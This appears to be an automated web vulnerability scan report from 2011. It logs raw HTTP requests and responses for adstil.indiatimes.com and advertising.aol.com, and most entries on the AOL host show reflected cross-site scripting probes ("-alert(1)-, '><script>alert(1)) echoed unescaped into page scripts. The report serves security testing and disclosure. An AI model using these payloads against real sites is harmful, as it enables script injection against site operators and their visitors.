HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:40:26 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 5490 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <!-- Support: http://adstil.indiatimes ...[SNIP]... m/RealMedia/ads/click_lx extFlashRight21 } extFlashRig ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:40:12 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:40:59 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:41:39 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:42:24 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 377 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:06:24 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:10 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 375 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:07:49 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 374 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:08:34 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 377 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:41:19 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 369 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:42:04 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 369 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:42:44 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 369 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Content-Type: text/html <A HREF="http://adstil ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adstil.indiatimes |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: adstil.indiatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:12:20 GMT Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0 Content-Length: 2393 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: text/html <!-- Support: http://adstil.indiatimes -- ...[SNIP]... /RealMedia/ads/adstream //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/0/4/1/ |
GET /c4746"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:23 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/c4746"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/1/4/1/ |
GET /528e8"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28091 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/528e8"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/2/4/1/ |
GET /b7887"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:58 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b7887"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/3/4/1/ |
GET /b55e7"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b55e7"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/4/4/1/ |
GET /474b3"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:36:23 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:36:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28093 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/474b3"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/5/4/1/ |
GET /b4849"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b4849"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/6/4/1/ |
GET /d039b"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/d039b"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/7/4/1/ |
GET /1ddf0"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/1ddf0"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/8/4/1/ |
GET /fbe48"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:37:50 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:37:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28095 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/fbe48"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai6c6dd"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:00:37 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:00:37 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28127 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai6c6dd"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php44bcc"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:01:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:01:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28127 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/nai.php44bcc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=3%007bbed'><script>alert(1 Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 10:59:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache, max-age=1 Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Expires: Sun, 04 Sep 2011 10:59:37 GMT Content-Type: text/html Content-Length: 13896 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_0' src='http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/2/1170877546/ |
GET /fb106"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
